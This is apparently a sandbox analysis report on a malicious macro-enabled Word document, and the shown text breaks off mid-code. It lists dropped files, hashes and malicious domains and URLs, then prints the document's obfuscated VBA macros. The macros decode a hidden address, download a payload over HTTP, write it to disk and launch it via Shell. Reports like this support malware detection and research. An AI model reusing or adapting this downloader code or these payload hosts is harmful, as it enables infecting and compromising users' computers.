Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):162
Entropy (8bit):2.145405781367122
Encrypted:false
MD5:AEB57E63BC42157218D902EC26C28600
SHA1:A49FC60365C2569DAF47605E133FF657FCCFFB99
SHA-256:AB193C7CF754ABFC5AAA5AD5C6726F8D9F5DE54D8D973AE393591495DACBC5EE
SHA-512:78AEE60975610E6FBE96EDF815E273E30BBCDA7A089E573029CABB3B1B743145226CD1B0C48BD469B80E495B6B27F36740EC6E28962C66FC95EC4B8006EFA2AF
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Templates\~WRD0000.tmp Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):20372
Entropy (8bit):7.467938030822673
Encrypted:false
MD5:E7DDC122634905202DF543B817FA1C0C
SHA1:93965A013DDF78E8CB823B56B7A92E77520029B1
SHA-256:DB4EFA4C0D6A5B881D14C0E0CC0B160DAEBE9EBD8F6FCDFE2D933AC52F30C3C2
SHA-512:D4BECB9C784F73EFC7FB47ADD23C9B1A0755D5D3C2E97B815D50854BF2B06B7D69464FC09CB64F46FDF8E114F08409B990BF3AF288DD4AD337DB0B74A6FD6134
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\{3BE59EA8-5E19-25B1-409F-72297443C66D} Download File
Process:C:\Windows\explorer.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):41
Entropy (8bit):4.217818932588802
Encrypted:false
MD5:2CE754C9FF1EC7C63DEBAFA8B3D4D12C
SHA1:A705E2317E6EF5FCE712BA7FF9C86F0EAF1EB865
SHA-256:3655E24379E9A14705C0225AC82C0BB6AFDE5058E7F68333E613C687501B104A
SHA-512:98191D84EB0441226F9D609EC0B678DBD634340F55B1558779E05A08183E05226AA3DC583A5C9BF7814D83CCCC3245C1E616E12EDF8D8D88C35528D1A664DC48
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\{A29E757B-998D-241A-33F6-DD98178A614C}\01D4DF331642F01E0B Download File
Process:C:\Windows\explorer.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Size (bytes):216
Entropy (8bit):3.5456763674858958
Encrypted:false
MD5:BE1DE233C5A415D19DDBC3BD5E7C8B7A
SHA1:A3441AF5A6C852F159601A3E05B707237EBAEEFF
SHA-256:0F99BCC793B817E8C83230DE150BE89333928B3E06D12D8F2FA33855B8E9712B
SHA-512:9BFD8A96134DBEE3416A558E2C7A66AAD61D93601343A87D265FC4036EA5E1C0047CD3A4935D56BA3BB90F5DA20E78AF65A0A90B04620048EDDF2F831BE4EB35
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js Download File
Process:C:\Windows\explorer.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):48
Entropy (8bit):4.5165414066556515
Encrypted:false
MD5:4DAA07115C67BED12909C4DFEA867BAD
SHA1:24ED93A0A23D41448CB8CF1F72127EEFF07D242E
SHA-256:F067EB85E0B4B3DB1C17A209B84D049551AB016098E2F6788E400298C5A4D0CA
SHA-512:7A1910448F8FA5E33FDC26519419E66BA1365E7B2F79760836A8A48947C1CF6D769DDDA2665DCE464F9F84B4680458573889A45017C3E0E584408A6E2421EA51
Malicious:true
Reputation:low
C:\Users\user\Desktop\~$1ZuYVo64.docm Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):162
Entropy (8bit):2.145405781367122
Encrypted:false
MD5:AEB57E63BC42157218D902EC26C28600
SHA1:A49FC60365C2569DAF47605E133FF657FCCFFB99
SHA-256:AB193C7CF754ABFC5AAA5AD5C6726F8D9F5DE54D8D973AE393591495DACBC5EE
SHA-512:78AEE60975610E6FBE96EDF815E273E30BBCDA7A089E573029CABB3B1B743145226CD1B0C48BD469B80E495B6B27F36740EC6E28962C66FC95EC4B8006EFA2AF
Malicious:false
Reputation:low
C:\Users\user\text.doc.16147.scr Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):783857
Entropy (8bit):6.321783327017934
Encrypted:false
MD5:2481F6BE75307B79607D12114D2B6102
SHA1:78A0D34B6C9BC08A11405C4D2E9DCE4D8D354EC9
SHA-256:79EBD97A34D3BD2F82956ED0C1EFD0F12CF5744E27A932CB627B463DA0A2A922
SHA-512:B4779B7252B129749EA3A29D126D590360215C47830C81AA1AC92A141B87B918569566DC17DE3B679CD494ED0E6BC61CA2F9808F895A50B634FB853B3753D6E4
Malicious:true
Reputation:low
\Device\Mailslot Download File
Process:C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe
File Type:data
Size (bytes):270337
Entropy (8bit):7.878221655827671
Encrypted:false
MD5:4E1015708C017491BB8E4B5B7190477A
SHA1:EE72F61FE8A7A203FA504CC9C6A8802ADDA81663
SHA-256:EC05F7D129CFC1611664E1362A2BE7B9AAFE8D322E4138031072068F28869F4E
SHA-512:9D7B2065F83437189F3EF83394DB66E8BFE50CB86E8CF4399CA15D11A7EFBB07F315243790D572F0E2DEAD047BEBA29881B0B1B1D9A54BCA2C15BE7214164E39
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
profitsproject.ru37.152.176.90truetrueunknown
myip.opendns.com185.189.150.76truefalsehigh
resolver1.opendns.com208.67.222.222truefalsehigh
interruption.ru178.169.196.83truetrueunknown
freedomhouse32.ugunknownunknowntrueunknown
1.0.0.127.in-addr.arpaunknownunknowntrueunknown
222.222.67.208.in-addr.arpaunknownunknowntrueunknown
8.8.8.8.in-addr.arpaunknownunknowntrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://31.148.219.163/images/logo2.pngfalse
    		unknown
    http://profitsproject.ru/images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.giftrue
      		unknown
      http://profitsproject.ru/images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmptrue
        		unknown
        http://interruption.ru/free/t32.bintrue
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://https://file://USER.ID%lu.exe/updavicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmptrue
            		low
            http://interruption.ru/free/t64.binavicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmpfalse
              		unknown
              http://www.%s.comPAexplorer.exe, 00000005.00000000.1108931725.01CE0000.00000008.sdmpfalse
                		low
                http://constitution.org/usdeclar.txtavicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpfalse
                  		unknown
                  http://constitution.org/usdeclar.txtC:avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpfalse
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPCountryFlagASNASN NameMalicious
                    37.152.176.90Iran (ISLAMIC Republic Of)
                    		198569unknowntrue
                    178.169.196.83Romania
                    		43205unknowntrue
                    31.148.219.163Czech Republic
                    		14576unknownfalse
                    46.139.176.151Hungary
                    		5483HTC-ASMagyarTelekomNyrtHUtrue

                    Private

                    IP
                    127.0.0.1

                    Static File Info

                    General

                    File type:Zip archive data, at least v2.0 to extract
                    Entropy (8bit):7.8710962138881895
                    TrID:
                    • Word Microsoft Office Open XML Format document with Macro (52004/1) 53.61%
                    • Word Microsoft Office Open XML Format document (41004/1) 42.27%
                    • ZIP compressed archive (4004/1) 4.13%
                    File name:e41ZuYVo64.docm
                    File size:104980
                    MD5:86c669750b5293dd57c4d24de9722418
                    SHA1:12e62f9008003f5eabd8c5dfbf27f9cb89eed2b9
                    SHA256:96f0b343edfd0dd74a179f5744b8b999dcf5bbb821ea00e49f774320cc02eb79
                    SHA512:200a0146c7c8fb29d0c112a08f4c69308e4fb5e203b32c4d44be5f7da5a128a6403b0391385997fe3ab633e72f468fe6dbe57ae24556102a517ab1e5521935e8
                    SSDEEP:3072:0tMtFaqDe19ReqUQtEVGyMUXOA5Hr3N8H1m/3t:KMaqS9Reqx7U+UjNe103t
                    File Content Preview:PK..........!.........O.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e6a2a2acbcbcac

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "word/vbaProject.bin"

                    Indicators

                    Has Summary Info:False
                    Application Name:unknown
                    Encrypted Document:False
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:False
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:False
                    Flash Objects Count:0
                    Contains VBA Macros:True

                    Streams with VBA

                    VBA File Name: J04Xt.bas, Stream Size: 9625
                    General
                    Stream Path:VBA/J04Xt
                    VBA File Name:J04Xt.bas
                    Stream Size:9625
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . $ . . . H . . . . . . . . . . . . 8 q r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 0e 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 24 0e 00 00 48 1e 00 00 00 00 00 00 01 00 00 00 e8 38 71 72 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    UrERz
                    String)
                    RAYYk
                    YcIPR
                    "Fgnvk"
                    String
                    NIuZE
                    JqQxS
                    Attribute
                    DrBDn
                    GjaAA
                    VB_Name
                    RdOLo
                    ASlRX
                    "AsukH"
                    VBA Code
                    Attribute VB_Name = "J04Xt"

Sub x(H3450 As String)

Dim Wcw23 As Long

Wcw23 = (902 + 159) / 43

Dim Vplft(6 To 253) As Long

Vplft(6) = (-110 + 845) + 33

Dim E5j8d As Long

E5j8d = (-602 - 950) - 18

Dim KKDAG(84) As Byte

KKDAG(84) = 140

Dim JPF2q As String

JPF2q = "P3Wdq"

Dim UrUg6 As String

UrUg6 = "Q13rR"

Dim Qg0lj(3 To 311) As Long

Qg0lj(3) = (-528 + 259) + 4

Dim Vy87F(7 To 248) As String

Vy87F(7) = Ik728

Dim X02ob As Byte

X02ob = 111

Dim Lgqf0(84) As Byte

Lgqf0(84) = 138

Dim Ej4Ik(44) As Byte

Ej4Ik(44) = 186

Dim Ltz67 As String

Ltz67 = "Qjod7"

Dim N36ch As Long

N36ch = (-487 + 918) + 46

Dim F1YcV As Byte

F1YcV = 234

Dim J5Unu(21) As Byte

J5Unu(21) = 116

Dim Z1Q05 As Long

Z1Q05 = (-385 / 711) - 36

Dim No560 As Byte

No560 = 104

Dim Gardq(14 To 44) As String

Gardq(14) = A014z

Dim Mj865 As Long

Mj865 = (565 / 173) + 19

Dim E38D5(13 To 76) As Long

E38D5(13) = (803 + 826) + 29

Dim H25p8(14 To 339) As String

H25p8(14) = "Z65y7"

Dim Yx77T(14 To 478) As String

Yx77T(14) = "Ph5Xn"

Dim YRnH6(24 To 499) As String

YRnH6(24) = UrERz

Dim BO5Ll(25 To 250) As Long

BO5Ll(25) = (-317 + 385) + 42

Dim DkZQe(83) As Byte

DkZQe(83) = 193

Dim In0TS(56) As Byte

In0TS(56) = 113

Dim W4sB8(9 To 436) As Long

W4sB8(9) = (-573 / 409) - 20

U5P6J = 3

Dim Np0lB As Byte

Dim SM03Q(96) As Byte

SM03Q(96) = 48

OG3wL = BjOEsxO3("kwws=2264147;154<14962lpdjhv2orjr51sqj", 3)

Dim W08oB(4 To 498) As String

W08oB(4) = YcIPR

Dim A17Ss(3 To 131) As String

A17Ss(3) = MRbO5

JqQxS = I8BD2(CStr(OG3wL), H3450)

Dim HWXvn(1) As Byte

HWXvn(1) = 193

Dim XpDX4(12 To 164) As String

XpDX4(12) = "PGNG2"

Dim S56Ei(2 To 137) As String

S56Ei(2) = NIuZE

Dim XH8ys As String

XH8ys = "Um550"

Dim D3771 As String

D3771 = EP2DB

Set H8sz2 = New LKfy2

Dim Phi5G(10 To 487) As Long

Phi5G(10) = (604 / 938) + 35

Dim DCU0D As String

DCU0D = "P8VN5"

Dim Pzq8I As String

Pzq8I = ZvDa2

Dim ASlRX As String

ASlRX = "HEV04"

Dim R4HT8 As String

R4HT8 = "Fgnvk"

Dim H05yl(23 To 116) As String

H05yl(23) = "EMy1m"

Call H8sz2.test1(JqQxS, H3450)

Dim RdOLo As Byte

Dim GZbj1(10 To 246) As Long

GZbj1(10) = (-373 - 474) + 14

Dim DrBDn As String

DrBDn = "J6DD5"

Dim FvrWP(28 To 88) As Long

FvrWP(28) = (823 / 524) / 27

Dim G6sS1(92) As Byte

G6sS1(92) = 19

Dim QN2gr As Long

QN2gr = (784 - 717) / 14

Dim E6t54(76) As Byte

E6t54(76) = 232

Dim RAYYk As String

RAYYk = "AsukH"

Dim MPbFq(66) As Byte

MPbFq(66) = 80

Call H8sz2.sh1(H3450)

Dim UqrUz(16 To 316) As Long

UqrUz(16) = (305 - 894) + 49

Dim G153l(6 To 118) As String

G153l(6) = G0d64

Dim JdUVu(29) As Byte

JdUVu(29) = 29

Dim G61y7 As Byte

G61y7 = 79

Dim E1886(18 To 265) As Long

E1886(18) = (-376 - 619) - 2

Dim Y8OAf(28) As Byte

Y8OAf(28) = 166

Dim R1Sfd As Long

R1Sfd = (-690 - 587) + 12

Dim L1SPN(58) As Byte

L1SPN(58) = 35

Dim CN0Hv(24 To 25) As Long

CN0Hv(24) = (588 - 519) - 12

Dim Bn7IT(12 To 248) As String

Bn7IT(12) = "MqXa4"

Dim Z616Y(58) As Byte

Z616Y(58) = 27

Dim BUaTF(6 To 252) As String

BUaTF(6) = W362Y

Dim D3r3M As Long

D3r3M = (-750 / 201) - 33

Dim RiA0L As Byte

RiA0L = 23

Dim R56lI As String

R56lI = "CA6bX"

Dim Snt77 As Byte

Dim IwL03(8 To 123) As String

IwL03(8) = GjaAA

Dim Zu23C As Long

Zu23C = (-184 - 544) + 44

End Sub
                    VBA File Name: JtuJu.bas, Stream Size: 14311
                    General
                    Stream Path:VBA/JtuJu
                    VBA File Name:JtuJu.bas
                    Stream Size:14311
                    Data ASCII:. . . . . . . . . 4 . . . . . . . . . . . . . . . < . . . . , . . . . . . . . . . . 8 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 34 14 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 3c 14 00 00 ac 2c 00 00 00 00 00 00 01 00 00 00 e8 38 0a 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    ZyRzJ
                    False
                    "KkZbP"
                    QGdom
                    JjohY
                    "JtuJu"
                    FfRhl
                    RRyRA
                    "MTXLz"
                    String,
                    String)
                    FuUpS
                    "DHrmI"
                    EMnFI
                    "GET",
                    "QdrWc"
                    ACblY
                    VB_Name
                    "GmIPI"
                    Public
                    "Eywfs"
                    VPlmH
                    ApYPS
                    ECehc
                    MPPFQ
                    IdLrH
                    WSeKK
                    YERsH
                    JYMxd
                    Ntfxk
                    String
                    LSprl
                    Attribute
                    JRCMV
                    Function
                    ChFnV
                    BSofa
                    VBA Code
                    Attribute VB_Name = "JtuJu"

Public Function I8BD2(HT73f As String, LuU0P As String)

Dim U5grB As Byte

Dim BZ5kz(47) As Byte

BZ5kz(47) = 223

Dim I18Kb As String

I18Kb = "DD4qR"

Dim Cy6v7 As String

Cy6v7 = VKsr5

Dim FI3dl As Long

FI3dl = (516 - 230) - 18

Dim Hky13 As Byte

Dim IdLrH As Long

IdLrH = (-25 / 456) + 31

Dim Qngb3(16) As Byte

Qngb3(16) = 145

Dim JB0z2 As Byte

Dim LS5OD As Byte

Dim Pf784 As String

Pf784 = VFDa2

Dim Gh0Hi(7 To 13) As String

Gh0Hi(7) = QGdom

Dim MieO2 As Byte

Dim JYMxd As Byte

JYMxd = 201

Dim OF46X As Byte

OF46X = 23

Dim D6G21(17 To 442) As String

D6G21(17) = TO8KM

Dim WtOn1 As Long

WtOn1 = (527 + 736) + 1

Dim FF6H5(31) As Byte

FF6H5(31) = 11

Dim Bu6X2(92) As Byte

Bu6X2(92) = 242

Dim SU7bX As Byte

SU7bX = 14

Dim XK2JW As Byte

XK2JW = 171

Dim HI6ZS As Byte

Dim SNu2g As Long

SNu2g = (499 - 716) / 14

Dim YLL53(16) As Byte

YLL53(16) = 64

Dim FFiqz(24) As Byte

FFiqz(24) = 167

Dim QWbb8 As Long

QWbb8 = (-631 - 525) + 28

Dim LSprl As Byte

Dim VTNzR(35) As Byte

VTNzR(35) = 171

Set NjL7i = New MSXML2.XMLHTTP60

Dim JjohY As Long

JjohY = (-208 / 955) / 19

Dim Ii2q5(29) As Byte

Ii2q5(29) = 168

Dim J02ms(33 To 183) As String

J02ms(33) = H87Y8

Dim JRCMV As Byte

Dim LJRn2 As String

LJRn2 = XPcZ8

Dim Y7r6A As Long

Y7r6A = (120 - 526) / 32

Dim A8y3O As String

A8y3O = Wt628

Dim VPlmH As Long

VPlmH = (-836 - 272) - 46

Dim N4Yxi As String

N4Yxi = "QdrWc"

Dim BD3cq As Byte

Dim PIs8w As Long

PIs8w = (-500 / 156) / 38

Dim N7HlY As Long

N7HlY = (749 + 930) + 20

Dim Zn5aV(23 To 108) As Long

Zn5aV(23) = (-173 + 224) - 36

NjL7i.Open "GET", HT73f, False

Dim Nc6qJ As String

Nc6qJ = "Rt6r5"

Dim D3Ic2 As String

D3Ic2 = Lyu7w

Dim UZ3ZO As Byte

Dim HFxF6(40) As Byte

HFxF6(40) = 48

Dim K81yo(14 To 498) As String

K81yo(14) = YT4R3

Dim SjZ35(71) As Byte

SjZ35(71) = 239

Dim BSofa As Byte

Dim C3G0E As Byte

Dim EiLn6 As Byte

EiLn6 = 248

Dim S42Zq(12 To 249) As String

S42Zq(12) = "U06mm"

Dim MPPFQ As Long

MPPFQ = (425 + 422) + 21

Dim CRaOL(7) As Byte

CRaOL(7) = 76

Dim YH7u0 As Byte

YH7u0 = 174

Dim ACblY As Long

ACblY = (223 - 137) / 9

Dim RJQIq(22 To 353) As Long

RJQIq(22) = (-338 / 233) + 48

Dim ChFnV As String

ChFnV = ECehc

Dim L35r0(22 To 373) As String

L35r0(22) = "G3mne"

Dim Byj44 As Byte

Byj44 = 63

Dim VNJM6(31 To 98) As String

VNJM6(31) = CTt54

Dim SRHtH(1 To 284) As Long

SRHtH(1) = (-276 + 526) / 16

Dim ZyRzJ As String

ZyRzJ = "VGe22"

Dim RRyRA As String

RRyRA = "F4gH0"

Dim J2OM5(8 To 488) As String

J2OM5(8) = "G6Kaw"

Dim ApYPS As String

ApYPS = "ELc2n"

Dim Az3p7(3 To 103) As String

Az3p7(3) = "MND87"

Dim EZ1ZV(66) As Byte

EZ1ZV(66) = 76

Dim Af13k As Long

Af13k = (-295 + 951) - 12

Dim R51Vs(27 To 65) As Long

R51Vs(27) = (-308 - 382) - 34

NjL7i.send

Dim PNT74(45) As Byte

PNT74(45) = 97

Dim Q2615 As String

Q2615 = "BMf14"

Dim K44qS As Long

K44qS = (342 / 470) + 13

Dim BAhW5(52) As Byte

BAhW5(52) = 21

Dim Jj1W5(5 To 73) As Long

Jj1W5(5) = (-438 / 935) - 9

Dim Rr5Bg(16 To 423) As String

Rr5Bg(16) = "ZhWm1"

Dim Mxq43(99) As Byte

Mxq43(99) = 19

Dim L8edw As String

L8edw = "BVsV7"

Dim Y2Eo8 As Byte

Y2Eo8 = 83

Dim SQ1x7 As Long

SQ1x7 = (-329 + 735) + 46

Dim Chd6y(20 To 59) As Long

Chd6y(20) = (-378 / 840) - 20

Dim VUpu6(18 To 238) As Long

VUpu6(18) = (581 + 854) / 3

Dim Tl0JN As Byte

Tl0JN = 135

Dim PinNp(30 To 173) As String

PinNp(30) = "UoI88"

Dim S40aq As String

S40aq = "Gta02"

Dim B3fX6(20 To 441) As Long

B3fX6(20) = (972 - 891) + 13

Dim HWO4Q As String

HWO4Q = "DHrmI"

Dim Vqs00(22 To 338) As String

Vqs00(22) = IO4H1

Dim YA1t2 As String

YA1t2 = "KkZbP"

Dim P3FE7 As String

P3FE7 = DMpT6

Dim OG7w8(26 To 272) As String

OG7w8(26) = V6si1

Dim U0JxK(97) As Byte

U0JxK(97) = 240

Dim Un55J As Long

Un55J = (-102 / 376) - 26

Dim J88mQ(27 To 101) As String

J88mQ(27) = WlH6E

Dim KcQt7(30 To 398) As String

KcQt7(30) = "InRz7"

Dim ZnrB1(27 To 492) As Long

ZnrB1(27) = (-645 / 403) / 49

Dim O4wI8 As String

O4wI8 = JNo8v

Dim YERsH As String

YERsH = D7Hyo

Dim Xlis1(6 To 91) As Long

Xlis1(6) = (868 + 851) + 10

OyTW4 = NjL7i.responseBody

Dim M5tx8(21 To 317) As String

M5tx8(21) = "MTXLz"

Dim WSeKK As String

WSeKK = FuUpS

Dim RZyw2(40) As Byte

RZyw2(40) = 81

Dim FfRhl As String

FfRhl = G065k

I8BD2 = OyTW4

Dim Ntfxk As Long

Ntfxk = (-66 - 109) + 26

Dim EMnFI As String

EMnFI = "Eywfs"

Dim YcD6N(73) As Byte

YcD6N(73) = 10

Dim MbC11 As String

MbC11 = "Tylh3"

Dim C0G6z(26 To 229) As String

C0G6z(26) = FG3dN

Dim RgWK0(28) As Byte

RgWK0(28) = 129

Dim S35Y4 As Long

S35Y4 = (-651 + 301) / 27

Dim XY43o(8 To 228) As Long

XY43o(8) = (-905 + 335) / 32

Dim O1x15(22) As Byte

O1x15(22) = 64

Dim M3R3w As Byte

Dim R3QFe(6) As Byte

R3QFe(6) = 30

Dim A78vE As Byte

A78vE = 126

Dim B664h As Long

B664h = (18 + 538) / 27

Dim QH55r As String

QH55r = "Ih5PG"

Dim B8i78 As Long

B8i78 = (-843 + 422) - 18

Dim JvV5U(46) As Byte

JvV5U(46) = 226

Dim RkMj1 As String

RkMj1 = "GmIPI"

End Function
                    VBA File Name: LKfy2.frm, Stream Size: 32970
                    General
                    Stream Path:VBA/LKfy2
                    VBA File Name:LKfy2.frm
                    Stream Size:32970
                    Data ASCII:. . . . . . . . . x - . . . . . . L . . . . . . . . - . . . f . . . . . . . . . . . 8 @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 78 2d 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 7f 2d 00 00 87 66 00 00 00 00 00 00 01 00 00 00 e8 38 40 cf 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    "JmTzx"
                    VAhvE
                    SgThF
                    False
                    NxyRH
                    "UmDpA"
                    NCPvi
                    OkaWA
                    MXWMF
                    VB_Exposed
                    Cdqbn
                    VB_GlobalNameSpace
                    PBnGN
                    HMDxF
                    IAJgk
                    VB_Customizable
                    PkcLo
                    DBJaS
                    EdbfP
                    "XuidR"
                    Dykvf
                    ZdOQk
                    KAJuJ
                    "OXkdT"
                    XCgdc
                    "Iundr"
                    SYbzA
                    VB_Creatable
                    JZMjI
                    GcRAS
                    VB_Name
                    QKBEp
                    PJUqj
                    .Write
                    Public
                    ReDim
                    "GzOjv"
                    FFBfg
                    "JqSOJ"
                    .Type
                    VB_Base
                    MmLPO
                    LjSQB
                    UsEEv
                    .Open
                    UyUCU
                    CoanH
                    VB_TemplateDerived
                    JrPYW
                    Binary
                    KrjXB
                    "BNFSv"
                    PueOR
                    String
                    QcItR
                    NEZVw
                    CreateObject("adodb.stream")
                    SbxRg
                    WHhbG
                    Attribute
                    VB_PredeclaredId
                    Close
                    "BqdZA"
                    VQDRI
                    QDpZG
                    KPnWw
                    JCCHw
                    LGvtQ
                    Shell
                    RdHtR
                    VBA Code
                    Attribute VB_Name = "LKfy2"

Attribute VB_Base = "0{0917F18E-9EE5-4716-82FB-F3C380FC94B1}{ECD25D7D-BA7A-4CC7-A896-BAC7A9D141C6}"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = False

Attribute VB_TemplateDerived = False

Attribute VB_Customizable = False

Public Sub test1(FW5Vg, Oj62U)

Dim HMDxF As Long

HMDxF = (381 / 353) / 30

Dim UbUB4 As Byte

UbUB4 = 137

Dim Ih7m7 As Long

Ih7m7 = (619 + 960) / 6

Dim ZGxe7 As String

ZGxe7 = "DzVR8"

Dim KsIBn(31 To 213) As String

KsIBn(31) = W6GKF

Dim WSn2h(27 To 32) As String

WSn2h(27) = Xbh0h

Dim NjUS4 As Byte

Dim DeD6w As Long

DeD6w = (567 / 165) - 46

Dim Lt5qg(95) As Byte

Lt5qg(95) = 197

Dim P6p0K As Byte

Dim JgRHa(88) As Byte

JgRHa(88) = 174

Dim AB3T3 As Long

AB3T3 = (-35 + 980) + 48

Dim QOhqa(21 To 327) As String

QOhqa(21) = ZGVT4

Dim Vl18Z As Long

Vl18Z = (395 - 767) + 28

Dim SBC3y(13 To 237) As Long

SBC3y(13) = (588 / 887) + 38

Dim PhO70 As Byte

PhO70 = 17

Dim TEe28 As Long

TEe28 = (528 - 713) / 45

Dim Emnh5(28 To 342) As Long

Emnh5(28) = (-322 + 695) + 4

Dim Jn7t4 As String

Jn7t4 = S8SxT

Dim Ag7HR As Byte

Ag7HR = 247

Dim D11C8(79) As Byte

D11C8(79) = 159

Dim KrjXB As String

KrjXB = IZy5i

Dim HHYU8(99) As Byte

HHYU8(99) = 88

Dim D60Tw(23 To 237) As Long

D60Tw(23) = (-371 / 438) + 48

Dim QRXmn(57) As Byte

QRXmn(57) = 165

Dim O42h2(90) As Byte

O42h2(90) = 13

Dim Ha1Oz As Byte

Dim GFRR5(7 To 493) As Long

GFRR5(7) = (949 + 872) / 23

Dim Cw05K(44) As Byte

Cw05K(44) = 62

Dim FkN4O As Long

FkN4O = (342 + 529) / 43

Dim Gu8Xe() As Byte

Dim YVJIa(1 To 100) As String

YVJIa(1) = "W6v4x"

Dim J1GIt(12 To 196) As String

J1GIt(12) = "CY3m7"

Dim RBnS3(27 To 62) As Long

RBnS3(27) = (61 + 535) + 2

Dim CHr22 As String

CHr22 = "R452k"

Dim MXWMF As String

MXWMF = Jm1cs

Dim VC8p1 As Byte

Dim Zz0vc As String

Zz0vc = ZOaK2

Dim I07BM As Byte

I07BM = 23

Dim C5VD1(8) As Byte

C5VD1(8) = 160

Dim V203p As Long

V203p = (973 - 135) / 21

Dim GwNDK(0 To 1) As Long

GwNDK(0) = (961 / 78) + 41

Dim Ez2bF As Byte

Dim Q8D6s(16 To 384) As String

Q8D6s(16) = R3bh6

With CreateObject("adodb.stream")

Dim NEZVw As String

NEZVw = R828O

Dim J43u7 As Long

J43u7 = (-384 - 743) / 43

Dim T5s85 As Byte

Dim SX1Vo As Long

SX1Vo = (-431 / 148) + 3

Dim AItjD(7 To 334) As String

AItjD(7) = "GOUC2"

